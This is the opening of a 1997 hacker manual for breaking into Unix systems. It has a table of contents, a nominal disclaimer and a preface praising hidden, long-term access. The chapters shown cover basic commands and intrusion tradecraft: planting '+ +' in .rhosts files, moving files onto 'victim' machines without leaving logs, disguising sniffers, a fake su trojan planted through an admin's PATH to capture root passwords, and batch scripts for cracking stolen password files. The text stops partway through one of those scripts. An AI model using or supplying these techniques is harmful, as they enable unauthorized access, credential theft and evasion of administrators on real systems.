unix_hacking_1997


 
THIS PAPER CONTAINS .C CODE - MAKE SURE TO TURN WORD WRAP OFF! In your editor!!
AND DO NOT SAVE ANY CHANGES TO THIS FILE IF ASKED....

Unix Utils
Linux/BSD/SySV/SunOS/IRIX/AIX/HP-UX

Hacking Kit v1.0.c Jan/97
Hacking Kit v2.0.b March/97  (this is an update)

  By: Invisible Evil
 IRC: #unixhacking #virus #hackers #virii #hacking #hacker
      #hack is just to busy for me ;)
NICK: i-e

If you have any other exploits, bugs, sniffers or utils that are not in here
please mail them to ii@dormroom.pyro.net. And I will be sure to keep you
updated with the latest version of this toolkit.

Comments are welcome.  Sys admin's that want to keep their system clean are
welcome to request the latest version.

If you are looking for perfect grammar or spelling please put this file in
your circular file.  I put enough time into this and just put it through
a cheap spell check.

Whats new?  Look for more info on tricks of the trade, and nfs mounting
drives to gain access to shells.  I am sure you will like the additions.
I have added a login trojan, in.telnetd trojan, and some more scripts for
scanning machines for mountable drives.  Have pun!


I will add a (*)  to  u p d a t e d  s e c t i o n s.


Contents:

Disclaimer
Preface

Chapter I - Unix commands you need to know

    1A. Basic commands
        Getting back to your home directory
        getting into a user home directory easy
        how to see what directory you are in now
        How to get a complete manual for each command
    1B. Telnet
        Unix file permissions
        Unix groups
        How to change permissions and groups
    1C. Rlogin
        .rhosts
        How to setup a .rhost file to login without a password
    1D. FTP
        Logging in to the site, but never out of the site.
        Using prompt, hash, and, bin
        Using get, put, mget, and, mput
    1E. GCC (unix compiler)
        How to get the file to the hack box without uploading it
        How to copy files to your home directory easy
        How to compile .c programs
        How to name them what you want
        How to load programs in the background while you log off
        Looking at your process with ps

Chapter II - Getting started (your first account)

    2A. Cracking password files
        How to get hundreds of accounts with your first hacked account
        Why you only really need one password cracked on a system
        How to get the root password from the admin, on an non-exploit system
        Using A fake su program
        Doc's for the fake su program
        How to find the admin's
        How to read .bash_history
        Cracker Jack - A good password cracker
        How to use crackerjack
        Word Files
        What you will need to get started
        Hashing the word files
      * Hash file for use with cracker jack and your word list
      * Hash file for use with cracker jack and your passwd file
    2B. Talking to newbe's
        How to find the newbe's
        How to get the newbe's passwords
    2C. The hard way
        Using finger @
        What could the password be?
        Getting more info from finger
        a small .c file to use if you get on
        Writing a small perl script to do the work for you.
        How to get a domain list of all domains from rs.internic.net
        A perl script to rip the domains & put them in a sorted readable list
        How to execute the perl script

  * 2D. Using mount to gain access to unix systems
      * What is nfs mount
      * What you need to get started
      * How to check a system to see if you can mount their drives
      * A script to scan for systems that are nfs mountable
      * How to mount the system
      * How to unmount the system
      * A Live Demo
      * Mounting the drive
      * Viewing the user directories
      * Editing the local machine's passwd file
      * How to put a .rhosts file in one on thier users directories
      * How to rlogin to the users account

Chapter III - Getting password files

    3A. PHF
        What is phf
        Using lynx or netscape to access phf
        Finding the user id the victims httpd (www) is running under
        How to see if you are root using phf
        How to cat the password file using phf
        Backing up the victims password file
        Changing a users password using phf
        Restoring the old passwords
        A .c file that will let you pipe commands to phf from your shell
        How to use the phf shell file
        Another way to use phf - text by quantum
        Quantum's bindwarez file
        A perl script that will try EVERY domain on the internet and log
        root access and snatch passwd files for you all day in the background.
        Doc's for the pearl script above
        Getting accounts from /var/?/messages
        A script to get the passwords for you if you can access /var/?/messages
    3B. Newbe's
        Lammer's
    3C. Getting shadow passwd files
        What is a shadow passwd
        Getting the shadow file without root access
        A .c file to cat any file without root access
    3D. Getting /etc/hosts
        Why get /etc/hosts

Chapter IV - Getting the root account

       What to do if you can't get root on the system
   4A. Bugs
       Intro
   4B. Exploits
       The umount/mount exploit
       What are SUID perm's
       The umount .c file
       How to compile umount.c
       The lpr Linux exploit
       The lpr Linux .c exploit file
       The lpr BSD .c exploit file
       How to use lpr
       Watch the group owners with lpr
       Just use lpr for first root, then make a SUID shell
       How to make the SUID root shell for future root access (root root)
       The splitvt exploit
       The splitvt exploit .c program
       How to use the splitvt exploit program
       The sendmail 8.73 - 8.83 root exploit shell script
       How to use the sendmail exploit to get root access


Chapter V - Making yourself invisible

       Keeping access
   5A. Zap2 (for wtmp/lastlog/utmp)
       Fingering the host before login
       How to login and stay safe
       How to configure Zap2
       Finding the log file locations
       The zap.c file
   5B. Other scripts
       The wted wtmp editor
       Command line usage for wted
       How to chmod the wtmp.tmp file
       How to copy the wtmp.tmp to the wtmp file
       Setting the path for the wtmp file in wted
       The wted.c file
       Cleaning the lastlog file using lled
       Command line options for lled
       How to use lled
       How to chmod the lastlog.tmp file
       How to copy the lastlog.tmp file to lastlog
       Setting the path for the lastlog file in lled
       The lled.c file
     * A good perl script for editing wtmp, utmp, and, checking processes
Chapter VI - Cleaning the log files

   6A. A walk around in a hacked system - let's login
       Logging on the system
       Watching for admin's
       Nested directories
       Having your root file ready
       Becoming invisible
       Greping the log directory
       Cleaning the logs
       Lets sniff the network
       Editing your linsniffer.c
       Looking at the processes running
       Compiling and naming your sniffer program
       Starting a sniff session
       Changing group file access
       Making a suid root shell trojan for uid=0 gid=0 every time
       Naming your trojan
       Touching the files date
       Checking the sniffer log file
       Setting the history files to null
     * Using unset for the history files
   6B. messages and the syslog
       How to find the logs are by reading /etc/syslog.conf
       How to see if there are logs in hidden directories
       How to see if logs are being mailed to user accounts
       How to see if logs are going to another machine
     * How to edit syslog.conf to hide logins
     * Restarting syslogd
       How to see if there is a secret su log by reading /etc/login.defs
   6C. The xferlog
       How to edit the xferlog
       How to grep and edit the www logs
       How to look for ftp logs
     * Other ways to edit text logs
     * Using grep -v
     * A script to rip text lines from these logs
     * Restarting syslogd
   6D. The crontabs
       How to find and read the root or admin's cron
       How to see if MD5 is setup on the machine
       What is MD5

Chapter VII - Keeping access to the machine

   7A. Tricks of the trade
       When the system admin has found you out
       What to expect from the admin
       History files
       Nested directories
       Placing trojans
       Hidden directories
       Making new commands (trojans)
       Adding or changing passwd file entry's
       Setting some admin accounts with null passwords
       The best way to add an account
       Editing a null account so you can login
       Installing more games or exploitable programs
       How to know your admin's
       Reading system mail (with out updating pointers)
       What to look for in the mail directories
       A program to read mail without updating pointers
   7B. Root kits and trojans
       What are root kits
       What are Demon kits
       What do trojans do


*********************************************************
* Appendix I - Things to do after access                *
*********************************************************
  The a-z checklist

*********************************************************
* Appendix II - Hacking / Security WWW / ftp sites      *
*********************************************************

*********************************************************
* Appendix III - More exploits for root or other access *
*********************************************************

A3-01. Vixie crontab buffer overflow for RedHat Linux
A3-02. Root dip exploit
A3-03. ldt - text by quantumg
A3-04. suid perl  - text by quantumg
A3-05. Abuse Sendmail 8.6.9
A3-06. ttysurf - grab someone's tty
A3-07. shadow.c  - Get shadow passwd files
A3-08. Abuse Root Exploit (linux game program)
A3-09. Doom (game) root exploit - makes suid root shell
A3-10. dosmenu suid root exploit
A3-11. Doom root killmouse exploit
A3-12. Root exploit for resize icons
A3-13. Root console exploit for restorefont
A3-14. Root rxvt X server exploit
A3-15. Root wuftpd exploit
A3-16. A shell script called gimme, used to read any system file

*********************************************************
* Appendix IV - Other UNIX system utilities             *
*********************************************************

A4-01. Cloak v1.0 Wipes your presence on SCO, BSD, Ultrix, and HP/UX UNIX
A4-02. invisible.c  Makes you invisible, and works on some SunOS without root
A4-03. SySV Program that makes you invisible
A4-04. UNIX Port scanner
A4-05. Remove wtmp entries by tty number or username
A4-06. SunOS wtmp editor
A4-07. SunOS 4+ Zap your self from wtmp, utmp and lastlog


*********************************************************
* Appendix V - Other Unix Exploits                      *
*********************************************************

A5-01. HP-UX Root vhe_u_mnt exploit
A5-02. IRIX Root mail exploit
A5-03. Root cron grabber - Crontab exploit for OSF/1, AIX 3.2.5, Digital UNIX
A5-04. IRIX mail exploit to make you any user on the machine - BUT NOT root
A5-05. BSD - crontab root exploit

*********************************************************
* Appendix VI - UUENCODED FILES                         *
*********************************************************

1. Quantum's Bindwarez binary file for PHF
2. Demon Root Kit - Includes: Banish, DemonPing, DemonSu, DemonTelnet
3. Linux Root Kit - Includes: Login, Netstat, and, PS
4. The Fake SU Program

**********
Disclaimer
**********

True this manual will aid hackers into breaking into systems but it is also
provided to guide system admin's on different security problems and help
with things to watch for on their system to keep hackers off.

If you use this manual to gain access to any system where you do not belong,
and do any type of damage, you alone will suffer for your stupid actions!

I am not telling you to break into any system, I am just showing some of
my experience, and things that I would do if I was to break into my own system.

This is for information only.....
ISP's Secure Your Systems!

*******
Preface
*******

Ok, lets get started.  If you are going to hack, you must be doing this for a
reason.  All hackers have their reasons for doing what they do.  Most are just
hungry to learn.  Most of what I have learned about unix, i have learned on
some service providers or someone else's machine.  I am one for the 'hands on'
experience.  There is much to learn and you would have to read 20,000 books
just to get what you would learn out of a few config files, a few admin email
messages, some .bash_history files, and some poking around a few systems.

Here in this manual you should learn how to be the 'complete hacker' and come
up with a style of your own.  It will not take to long, but it will take some
practice and experience before you will be able to call yourself a hacker.

Not just anyone that can crack a password file, and log into a unix machine
can call themselves a hacker.  Ok, you can get root access to a box!  You still
are not a hacker!  You need to know why you are a hacker first, and then have
your 'code' and 'style'.  You need a purpose and a reason for hacking into any
box.  The true hacker knows why he is doing what he does, and is doing it for
reasons like knowledge, free information, and ACCESS. The true hacker will
turn one hack into access to many different systems and providers and keep this
access for future learning and more FREE information.

The wan-a-be hacker will not be invisible, and will do many stupid things like:
delete or corrupt data, down the machine, run bots or irc clients from root
accounts or machines Give the passwords he cracked to everyone in the world
to prove they can hack. Or they might just do stupid things that will get
themselves cought.  I think sometimes this is done purposely just to draw
attention to themselves so they can get cought and make the announcement that
they are a hacker, and they were here!  A real hacker needs no such glory,
he just needs the access and wants to keep it and be invisible! He will not
tell many friends about the system, he will not give out the passwords or
accounts, he will keep others off so he can continue his access there and
keep it clean.

Here in this manual i hope that i can add enough style so that you can have
real heart in this matter and and be a good clean hacker.

Happy hacking ...

--------------------------------
Chapter I

Unix commands you need to know.
--------------------------------

There are just a few basic commands you need to learn, and then some unix
programs that will aid you in logging in logging into or keeping access to
the machine.

Call your local internet service provider and ask them to sell you a shell
account so that you will have something to practice on to learn these
basic commands.  The average shell account might cost you $10.00 per month
if you don't already get one with your existing account.

--------------
Section 1A

Basic commands
--------------

I hope you have a basic knowledge of DOS, that would help a bit, and I will
assume that you already do in writing this manual.

DOS Commands you are used to first:

REMEMBER: unix is case sensitive, so if I here use lower case you must also,
if I use a space you must also.  DOS will let you get away with allot of things
but unix will not!

DIR/W      = ls
DIR        = ls -l
DIR/AH     = ls -al  AH=(hidden) -al=(include hidden files as well as regular)
RENAME     = mv
ATTRIB     = chmod
MD         = mkdir
RD         = rmdir
DEL        = rm
COPY       = cp

These are the basic commands, i suggest that you lookup the man pages
on each one of these commands from your unix shell.  You would do this by
typing 'man command' without the ''.

each one of these commands will have switches for them, like cp -R to copy
files and directories.  So you would type man cp to get all of the switches
you can use with the copy command.

cd {then press enter} will always take you to your home directory
cp filename $HOME will copy the file to your home directory
cd ~username will take you to that users home dir if you have access to be
   there
pwd {press enter} will show you what directory you are in.

-------------
Section 1B
Telnet
-------------

Telnet is a command that you can use from a shell account, or from an exe
file (telnet.exe) from Windows, OS/2, Windows 95 and other operating systems
that will let you connect to another machine on the net.  There are other
programs you will learn about here like FTP, and rlogin that you can use as well
but now we will use telnet.

You can use telnet if you know the IP address or the host name you want to
connect or login to.  To use the command you would just use the telnet program
to connect to the IP or host like this:

Telnet netcom.com  or  telnet 206.146.43.56

Ok, now lets login:

telnet machine.com

trying .....

Connected to machine.com

Linux 2.0.28 (machine.com) (ttyp0)

machine login:username
password:#######

bash$

Your prompt might look different, but we will use this one.

Notice above that it will tell you the O/S when you get the login prompt.
You can use this if you get a large collection of passwd files.  Even before
going on to crack them sort them by O/S types by just telnet-ing to them to
see what they are running.  There are other ways, but lets keep this telnet
topic going for a sec... telnet domain.name.com, after you see what they are
running make a note of this and ctrl ] to break out of the connection.

Put all of your linux passwd files into a pile to be cracked first.  All we
need is one account that works for the system, and we can be almost sure
we will have root on that machine!  There are way to many holes in linux to
think we will not be able to own one of those machines, so lets get to work so
we can start this wonderful world of hacking.

----------------------
Unix File Permissions
----------------------

bash$

bash$ cd /tmp
bash$ ls -l
total 783
-rwx------   1 wood     users           1 Jan 25 18:28 19067haa
-rw-r--r--   1 berry    mail            1 Jan 16 12:38 filter.14428
-rw-------   1 rhey19   root       395447 Jan 24 02:59 pop3a13598
-rw-------   1 rhey19   root       395447 Jan 24 03:00 pop3a13600
drwxr-xr-x   4 root     root         1024 Jan 12 13:18 screens

First notice that we used a / and not \ to change to the tmp directory! Unix
uses the / as the root so it is backwards from DOS here.
Notice we did ls -l for the long directory. If we did 'ls' we would have what
you see below.

bash$ ls
19067haa      filter.14428  pop3a13598    pop3a13600    screens

With what we see here can not tell much, so most of the time we will be
using ls -al with the -al we will see the hidden files also, hidden
files and directories will always start with a '.'.  Now watch:

bash$ ls -al
total 794
drwxrwxrwt   4 root     root         8192 Jan 25 23:05 .
drwxr-xr-x  22 root     root         1024 Dec 28 18:07 ..
-rw-r--r--   1 berry    users           6 Jan 25 23:05 .pinetemp.000
drwxr-xr-x   2 berry    users        1024 Jan 25 23:05 .test
-rwx------   1 wood     users           1 Jan 25 18:28 19067haa
-rw-r--r--   1 berry    mail            1 Jan 16 12:38 filter.14428
-rw-------   1 rhey19   root       395447 Jan 24 02:59 pop3a13598
-rw-------   1 rhey19   root       395447 Jan 24 03:00 pop3a13600
drwxr-xr-x   4 root     root         1024 Jan 12 13:18 screens

.pinetemp.000 is a hidden file, and .test is a hidden directory.

-rw-r--r--   1 berry    mail            1 Jan 16 12:38 filter.14428

row 1          row2     row3
----------------------------

Now here we need to learn about permissions, users, and groups.

Row #1 is the file permissions
Row #2 is who owns the file
Row #3 is the group owner of the file

File permissions are grouped together into three different groups.
If the line starts with a d, it is a directory, if there is no d, it is a file.

- --- --- ---
| |   |   |--------> Other = anyone on the machine can access
| |   |------------> Group = certain groups can access
| |----------------> User  = only the owner can access
|------------------> Directory Mark



- rw- r-- r--
| |   |   |--------> Other can only read the file
| |   |------------> Group can only read the file
| |----------------> User  can read or write to the file
|------------------> It is not a directory


- rwx rwx r-x
| |   |   |--------> Other can read and execute the file
| |   |------------> Group can read write and execute the file
| |----------------> User  can read write and execute the file
|------------------> It is not a directory


The owner is the user name in row #2 and the group owner is the name in row #3.
In DOS the file has to have a .exe, .com, or .bat extension to execute, but in
unix all you need is the --x in your group of user, other, group

You can change these permissions if you own the file or have root access:

---------------------------------------------------------------------------
chmod oug+r filename will make all three groups of permissions be able to
read the file.

chmod og-r filename would make the file readable only to the user that owns
the file.  (notice the - or + to set the file yes or no)

chmod +x filename would make the file execute by all.

chown username filename would make the file owned by another user.
chgrp groupname filename would make the file owned by another group.
---------------------------------------------------------------------------

Make sure to keep file perm's and groups the same or you will be sniffed
out and booted from the system.  Changing configs on the system might only
break other functions, so keep your paws off or you are just asking to get
cought.  Only do what you are *SURE* of.  Only use commands that you know,
you might find yourself spending hours fixing just one typo like
chown -R username /* could keep you busy for a year ;)

Just be careful!

We will get into this stuff more as we go into the needs for this.

------------------
Section 1C Rlogin
------------------

There is another command you might use and we will get into this elsewhere
as we get into using rlogin to login to a system without a password.

For now read the man pages on rlogin by using the man rlogin from your
shell account.

The basic command would be :

rlogin -l username hostname
connecting....
password:

bash$

Rlogin requires the user to have a file in their home directory that tells
what system they can receive the rlogin from.  In this file .rhosts it would
look like this:

username hostname (or) hostname

if you were to add to this file   + +   it would let any user from any host
login without a password.

The file would look like this:

----- cut here ------
+ +
_____ cut here ------

if they already had entry's you could add the + + under their host names, but
remember now they would notice seeing they would now be able to rlogin
without the password.  You would be targeting people that did not
already have a .rhosts file.

---------------
Section 1D FTP
---------------

Another way to login will be FTP.  You can use a windows client, or just
login from a shell.

ftp ftp.domain.com

This will allow you to download or upload files to the site you are hacking.
Just make sure to edit the xferlog (see section 6d) to wipe your tracks
on the system.  Remember NEVER to ftp or telnet out of the hacked system, only
log into it!  If you are coming from your own system, or from another hacked
account you might just be giving your login and password to the system admin
or another hacker on their system.  There could be a telnetd or ftpd trojan
loaded on the system, or even a sniffer.  Now you would have just gave someone
your login id and password.  And if this was the system admin, he might have
the idea that revenge is sweet ;)

Using ftp from the shell, I would suggest using a few commands:

After you login, and have your prompt, type these commands
pressing enter after each one.

prompt
hash
bin

prompt will allow you to type a command like (mget *) or (mput*) and transfer
an entire directory without having it prompt you for each file yes or no.

               hash marks
hash will put ############ on the screen so you can see the transfer
is still moving and at what speed.

bin will make sure you get the files in the right mode, and if transferring
binary files, you will be sure they will uncompresses.

The transfer commands are easy, get filename, or, put filename, or for many
files you can use regular wild cards with mput  or mget.

--------------------
Section 1E
GCC compiler
--------------------

There will be a time when you will need to compile a .c file.

It is best to compile on the machine you are working on.  So upload or copy
and past the files to the hacked box and compile them there.  If you have
problems with their compiler you can try to upload pre-compiled files.

One way to get the file up to the victims machine would be to use copy
and paste.  Get a good tsr or windows shareware program to do this if
you do not have any way to do it now.  You can copy a script file from
one window and paste it into an editor on the victims machine, and then compile
the new file.  Walaa... no upload log of the file.  You can copy and paste
from the victims machine as well so that there are no download logs of ascii
files.

To copy and paste you can just open an editor on the hacked box, and then copy
from your other session, and paste your script into the editor and save the
file.  This way there will not be anything in the xferlog yet.

You can do the same thing with the password file.  If you do decide to
download the password file using ftp, make sure to copy it to your home
directory first under a different name.

bash:/etc:> cp passwd $HOME/plog  would copy the file called passwd from the /etc
directory you were in, to your home directory in a file called plog instead of
passwd.  Admin's grep the xfer logs looking for who is downloading the passwd
file.

Another way to get file to or from the box without showing up in the logs
would be to open an irc session on the victims machine, then from your other
session where you are already a user on irc, send the files using dcc.

The command to send the files would be /dcc send  
The command to get the file on the other side would be /dcc get  

It would be nice if you had a bot loaded on the irc when you were hacking so
that you could just send files to the bot and have it auto receive them.

A 'bot' is a robot program that you can load in the background on your shell
account that will receive files, keep channels open, etc...


The GCC compiler is easy...

gcc filename.c -o filenameyouwant

If i was to compile a file called z2.c that would zap the log files i would
type this:

gcc z2.c -o zap

This would give me a file that would exe, called zap

If I just typed : gcc z2.c  I would have a file named a.out, that was the executable
file and would have to rename it to zap, or some name i would know by doing
this: mv a.out zap

Now I would have a file named zap that was executable instead of a.out.

You will want to make sure you are not naming these files names that sys admin's
will know.  If you had a sniffer file called 'linuxsniffer.c' you don't
want to keep the same name ;) call it something like:

gcc linuxsniffer.c -o lsn

Remember also sometimes you can execute these files names right in the directory
by just typing the file name like for our 'lsn' (sniffer) above just by
typing lsn.  But sometimes this will not work unless you add a ./ to the
command.  So remember, sometimes you will need to type ./lsn  or your file
name.

Also there will be a time you will want a program to run in the background
even after you logoff.  Like in the case of the sniffer above.  In this case
you might want to name your sniffer something that would not be so easy
noticed.  Use your own style here.  BUT to make it stay in the background while
you are off the system you need to run the command with a & after the command.

lsn&

If you were to just type lsn, your screen would pause, and you would not be
able to type while the program was sniffing, but if you typed lsn& it would
load and the system prompt would come right back to you.  Also the system
would let you know it was loaded by giving you the process id # that it
was loaded as.

You could view the process with the ps -x command, you might want to run
ps -auxe |more

a= all
u= show user
x= yours
e= env

some machines
f=tree
or command: pstree

------------------------------------
Chapter II
Getting started (your first account)
------------------------------------

There are many ways to get a starter account. I will go into each area to
help you get started.  All you need is one good account to spawn off to
hundreds of accounts.  Think of this; You get one good exploitable system,
most any linux machine ;)

Now you get root access and load a sniffer program.  The TCP sniffer will
search out any login process on the network and log the login and password
for any telnet, ftp, or dial-in session going out or coming into the system.

Now even if it is a small ethernet connection you have around 100 passwords
for a few machines or domains.  If a larger net provider you have hundreds
of accounts all over the world!  All you need for this is one good account
and password to an exploitable system.  If it seems you can not exploit
root on the system, this might be a good system to crack passwords on and
exchange the accounts for other accounts from hackers or irc users that are
looking to load a bot but do nt have the shell account or disk space to do
it.  NEVER give out even one password to a system you exploited root on.
Keep these systems to yourself!

Lets now get into ways to get your first accounts.

------------------------
Section 2A.
Cracking passwd files
------------------------

If you are hacking with the right frame of mind, you will run the crack
program until you get one good account that will let you into the system.

You will login and see if you can exploit root on the system, if so, get root,
get the files you need to use into your nested directory, and erase your
presence, and clean all of the logs.  Now you are ready to load your sniffer.

Why go on hacking passwords for a system that within 24 hours you will have
most of the passwords anyway?  Not only for the machine you just hacked, but
other machines that were connected to as well.  If the system is not
exploitable don't even waste your time on it, go on to the next.  At a latter
date if you want to crack passwords for accounts to trade go ahead.

If you get an admin's account cracked you might want to read his history files,
and see if he is using the su command to access root allot.  If he is you can
use an su trojan on him.  This will get you the root password.  This works like
this:  You change his shell script so that a hidden directory (.term) is good,
is set in the search path before all other directories.  You put a fake su
binary in the .term (or other) directory.  He types su, everything looks good
to him, he types in the root password when prompted, the password id copied to
a log file in /tmp/.elm69, and deletes the trojan su file, and returns to him a
password error telling him to try again.  He thinks he must have done something
wrong and runs su again, but this time the real one and logs in.

You will find this fake su program in the last appendix named uuencoded files.

Here are the docs:

Fake SU by Nfin8 - i-e

IRC: /msg i-e

Easy as 1,2,3 ...

1. Change the path in one of the user accounts that you have access to that
you see is using SU from reading their history files, to hit a path first
that you have placed the su trojan file into.  .term or .elm is good!

2. Make sure to edit the top of the su.c file to the path you will be using
so that the sutrojan will delete isself and let the real SU work for the
second try.

3. Put all of the files in the target directory and compile the su.c file.

gcc su.c -o su

Then delete all of the files but the su.  All done!

.bash_profile might look like this:

# .bash_profile

# Get the aliases and functions
if [ -f ~/.bashrc ]; then
        . ~/.bashrc
                fi

# User specific environment and startup programs

PATH=$PATH:$HOME/bin
ENV=$HOME/.bashrc
USERNAME=""

export USERNAME ENV PATH

You change the first line to: PATH=$HOME/.term:$PATH:$HOME/bin


When the sys admin run's 'SU' it will run the SU-trojan in the .term
directory first and report that the password he typed was wrong, the
Trojan su program would have put a hidden file in the /tmp directory for
you that contains the root password (or account passwd) typed.  If it was
an account rather then the root password it will let you know the account
name. Then the trojan su program deletes itself so that the next try will
get the real su program.


You can find the admin's at the top section of the passwd file in the /etc
directory.  Just type :  more passwd

You can be sure that the first two real accounts made in the passwd file are
admin's, also sometimes you can find others by where their directories are
located in the password file.  Like /staff/username.

The history files are in each users account directory.  You can read these to
see what the last commands were that were typed by the user.  Sometimes as
much as the last 100+ commands.  Look for the file .bash_history, or History,
you can read these using more.  command: more .bash_history, or most times to
keep your typing you can type : more .b*  (or) just type : more .b (and then
hit the tab key on your keyboard).

Ok so now you need a good password cracking program. You can see in the next
chapter on how to get password files from systems that you do not have an
account on, but it is catch 22, you need the password cracking program too.

There are three things that you will need.

1. Password cracking program
2. Good word files
3. Password files

The best password cracking program to start would be crackerjack.  You can
search the web and find this easy as 1,2,3.  Download it and you are ready
to go.  If you are a bit more advanced you can download a cjack for unix and run
it in a shell.  But if you are just getting started get the DOS/OS/2 version.

Also search for some good word files.  The best word files are the names.
You will find that most unsecured passwords out there are guy's girlfriends
names, of girls boyfriends names ;)  You will find word files like
'familynames' 'babynames' 'girlsnames' 'boysnames' 'commonpasswords'
hackersdict' and other like these to be the best.

Load crackerjack like this:

[D:\jack]jack

Cracker Jack version 1.4 for OS/2 and DOS (386)
Copyright (C) 1993, The Jackal, Denmark

PWfile(s) : domain.com.passwd

Wordfile  : domain.com.passwd

Like above run the password file as the wordfile first.  This will get you all
of the logon's first that used their login name as their password, also if they
used any other info like their real name or company name it will hit right away
and you will not have to wait for the program to search through a word file.

If you want to hash the word file to get more out of it you can read the doc's
for crackerjack.

Hashing is where you can tell crackerjack to change the case of the wordfile
or even add numbers or letters to the beginning or end of the words in the word
file, like sandy1 or 1sandy.  You will find that many users do this and think
they are more secure.

Here are hashing files for both the passwd file and your word list.  After
looking these over you will see how you can modify these or create new ones
to suit your needs.

------------ start of dicthash.bat
@echo off
cls
echo - THIS FILE FOR DOS MACHINES
echo ----------------------------------------------------------------------
echo - To work this batch file have all of the crackerjack files in the
echo - current directory with this batch file, along with your dict and
echo - password file.  Then use this batch file using the following format:
echo -
echo - dicthash.bat dictfilename.ext passwordfilename.ext
echo -
echo - Make sure to have the jpp.exe and jsort.exe files in your dir as well.
echo -
echo - dicthash will first load jack running the dict file against your
echo - password file in both cases, then it will add numbers 0-9 both to
echo - the begining and end of every dict word.  This will take a while,
echo - so go out for that week vacation!
echo -
echo - If you get tired you can 'ctrl c' to the next option or number.
echo -
echo - ii@dormroom.pyro.net
echo -
echo - Mail me some of your hits, let me know how this works for you ;)

jpp -lower %1 | jack -stdin %2
jpp %1 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.1 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.1 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %2
jpp  -dot:0 %1 | jpp -translate:.2 | jack -stdin %2
jpp  -dot:7 %1 | jpp -translate:.2 | jack -stdin %2
jpp  -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %2
jpp  -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %2
jpp  -dot:0 %1 | jpp -translate:.3 | jack -stdin %2
jpp  -dot:7 %1 | jpp -translate:.3 | jack -stdin %2
jpp  -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %2
jpp  -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %2
jpp  -dot:0 %1 | jpp -translate:.4 | jack -stdin %2
jpp  -dot:7 %1 | jpp -translate:.4 | jack -stdin %2
jpp  -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %2
jpp  -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %2
jpp  -dot:0 %1 | jpp -translate:.5 | jack -stdin %2
jpp  -dot:7 %1 | jpp -translate:.5 | jack -stdin %2
jpp  -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %2
jpp  -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %2
jpp  -dot:0 %1 | jpp -translate:.6 | jack -stdin %2
jpp  -dot:7 %1 | jpp -translate:.6 | jack -stdin %2
jpp  -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %2
jpp  -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %2
jpp  -dot:0 %1 | jpp -translate:.7 | jack -stdin %2
jpp  -dot:7 %1 | jpp -translate:.7 | jack -stdin %2
jpp  -lower -dot:0 %1 | jpp -translate:.7 | jack -stdin %2
jpp  -lower -dot:7 %1 | jpp -translate:.7 | jack -stdin %2
jpp  -dot:0 %1 | jpp -translate:.8 | jack -stdin %2
jpp  -dot:7 %1 | jpp -translate:.8 | jack -stdin %2
jpp  -lower -dot:0 %1 | jpp -translate:.8 | jack -stdin %2
jpp  -lower -dot:7 %1 | jpp -translate:.8 | jack -stdin %2
jpp  -dot:0 %1 | jpp -translate:.9 | jack -stdin %2
jpp  -dot:7 %1 | jpp -translate:.9 | jack -stdin %2
jpp  -lower -dot:0 %1 | jpp -translate:.9 | jack -stdin %2
jpp  -lower -dot:7 %1 | jpp -translate:.9 | jack -stdin %2
jpp  -dot:0 %1 | jpp -translate:.0 | jack -stdin %2
jpp  -dot:7 %1 | jpp -translate:.0 | jack -stdin %2
jpp  -lower -dot:0 %1 | jpp -translate:.0 | jack -stdin %2
jpp  -lower -dot:7 %1 | jpp -translate:.0 | jack -stdin %2

---------------- end of dicthash.bat

---------------- start of jackhash.bat
@echo off
cls
echo - THIS FILE FOR DOS
echo ----------------------------------------------------------------------
echo - To work this batch file have all of the crackerjack files in the
echo - current directory with this batch file, along with your password file.
echo - Then use this batch file using the following format:
echo -
echo - jackhash.bat passwordfilename.ext
echo -
echo - Make sure to have the jpp.exe and jsort.exe files in your dir as well.
echo -
echo - jackhash will first load jack running the passwd file against
echo - itself in both upper and lower cases, then it will add numbers 0-9
echo - both to the begining and end of every dict word.  This will take
echo - a while, so go out for that week vacation!
echo -
echo - If you get tired you can 'ctrl c' to the next option or number.
echo -
echo - ii@dormroom.pyro.net
echo -
echo - Mail me some of your hits, let me know how this works for you ;)

jpp -gecos:5 -lower %1 | jack -stdin %1
jpp -gecos:5 %1 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
